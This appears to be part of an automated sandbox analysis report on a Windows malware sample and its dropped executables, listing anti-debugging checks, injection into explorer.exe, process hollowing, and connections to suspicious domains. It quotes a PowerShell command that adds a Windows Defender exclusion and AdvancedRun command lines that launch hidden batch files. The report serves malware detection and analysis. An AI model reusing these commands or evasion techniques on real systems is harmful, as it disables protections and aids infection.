                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F2430 mov eax, dword ptr fs:[00000030h]30_2_6B1F2430
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F2430 mov eax, dword ptr fs:[00000030h]30_2_6B1F2430
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8C14 mov eax, dword ptr fs:[00000030h]30_2_6B2A8C14
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B215C70 mov eax, dword ptr fs:[00000030h]30_2_6B215C70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B mov eax, dword ptr fs:[00000030h]30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8C75 mov eax, dword ptr fs:[00000030h]30_2_6B2A8C75
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC77 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC77
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC77 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC77
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC77 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC77
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC77 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC77
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F746D mov eax, dword ptr fs:[00000030h]30_2_6B1F746D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8450 mov eax, dword ptr fs:[00000030h]30_2_6B2A8450
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D649B mov eax, dword ptr fs:[00000030h]30_2_6B1D649B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D649B mov eax, dword ptr fs:[00000030h]30_2_6B1D649B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DEC9B mov eax, dword ptr fs:[00000030h]30_2_6B1DEC9B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DEC9B mov eax, dword ptr fs:[00000030h]30_2_6B1DEC9B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D4B0 mov eax, dword ptr fs:[00000030h]30_2_6B20D4B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A9CB3 mov eax, dword ptr fs:[00000030h]30_2_6B2A9CB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D1480 mov eax, dword ptr fs:[00000030h]30_2_6B1D1480
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4CB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D4CB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 mov eax, dword ptr fs:[00000030h]30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2CDB mov eax, dword ptr fs:[00000030h]30_2_6B1D2CDB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28D4E1 mov eax, dword ptr fs:[00000030h]30_2_6B28D4E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2914FB mov eax, dword ptr fs:[00000030h]30_2_6B2914FB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CCC0 mov eax, dword ptr fs:[00000030h]30_2_6B20CCC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CCC0 mov eax, dword ptr fs:[00000030h]30_2_6B20CCC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CCC0 mov eax, dword ptr fs:[00000030h]30_2_6B20CCC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CCC0 mov eax, dword ptr fs:[00000030h]30_2_6B20CCC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8CD6 mov eax, dword ptr fs:[00000030h]30_2_6B2A8CD6
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_04900D90 mov eax, dword ptr fs:[00000030h]34_2_04900D90
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_0490092B mov eax, dword ptr fs:[00000030h]34_2_0490092B
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_0041D500 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041D500
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B206B90 rdtsc 30_2_6B206B90
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_1_004026C8 LdrLoadDll,20_1_004026C8
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_0041D500 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041D500
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_00426790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00426790
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 19_2_0041D170 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0041D170
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 19_2_00426400 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00426400

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: iyc.jelikob.ru
                      Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                      Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                      Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: 6630.exe.7.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeThread created: C:\Windows\explorer.exe EIP: 2861920Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeThread created: unknown EIP: 3101920Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeThread created: unknown EIP: 54219C0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeThread created: unknown EIP: 6CE1920
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -ForceJump to behavior
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base address: 400000Jump to behavior
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41C000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41E000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: DB6008Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeProcess created: C:\Users\user\Desktop\SYzU0M7gx6.exe 'C:\Users\user\Desktop\SYzU0M7gx6.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dtrsehcProcess created: C:\Users\user\AppData\Roaming\dtrsehc C:\Users\user\AppData\Roaming\dtrsehcJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess created: C:\Users\user\AppData\Local\Temp\9A51.exe C:\Users\user~1\AppData\Local\Temp\9A51.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /SpecialRun 4101d8 400
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,32_2_00401C26
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,30_2_6B20E730
                      Source: explorer.exe, 00000007.00000000.261214755.0000000001400000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: explorer.exe, 00000007.00000000.278664281.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000007.00000000.261214755.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000007.00000000.276059781.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
                      Source: explorer.exe, 00000007.00000000.261214755.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000007.00000000.297424338.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2049.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3113.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5508.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
